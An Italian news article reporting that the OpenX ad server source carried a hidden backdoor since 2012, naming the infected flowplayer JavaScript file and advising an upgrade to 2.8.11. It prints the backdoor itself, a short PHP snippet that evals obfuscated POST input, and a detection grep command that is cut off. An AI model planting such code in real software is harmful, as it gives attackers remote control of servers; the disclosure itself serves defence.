Nessun risultato. Prova con un altro termine.
Guide
Notizie
Software
Tutorial

OpenX: una backdoor nell'ad server dal 2012

Link copiato negli appunti

OpenX è stato infettato con una backdoor. Non si tratta di una compromissione recente, già dal novembre 2012 infatti i sorgenti dell'ad server open source più usato al mondo sono stati infettati da una backdoor che consentiva l'upload di una shell, un "canale" in grado di fornire a un attaccante il controllo completo del gestionale banner. La scoperta è stata fatta dal magazine Heise Security e resa nota dal SANS (in lingua inglese) che ha individuato una backdoor nel file "/plugins/deliveryLog/vastServeVideoPlayer/flowplayer/3.1.1/flowplayer-3.1.1.min.js".

this.each(function(){l=flashembed(this,k,j)}

Nel file JavaScript è stato incluso codice PHP che permette l'esecuzione di codice attraverso la funzione eval:

<?php
$j=’explode’;
$_=$j(",",’strrev,str_rot13,vastPlayer’);
eval ( $_[1]($_[0]( $_POST[$_[2]])) );

Heise consiglia di eseguire la seguente ricerca (valida su Linux o sistemi Unix-like) per individuare la presenza della backdoor nella propria installazione di OpenX:

find. -name \*.js -exec grep -l '

Se utilizzate OpenX per la gestione dei banner è consigliabile un controllo approfondito.

Aggiornamento 8 agosto 2013OpenX ha rilasciato una nuova versione che è esente da backdoor: OpenX 2.8.11. Chi utilizza la versione infetta, cioè la 2.8.10 possono seguire i consigli dati dagli sviluppatori del software.

Ti consigliamo anche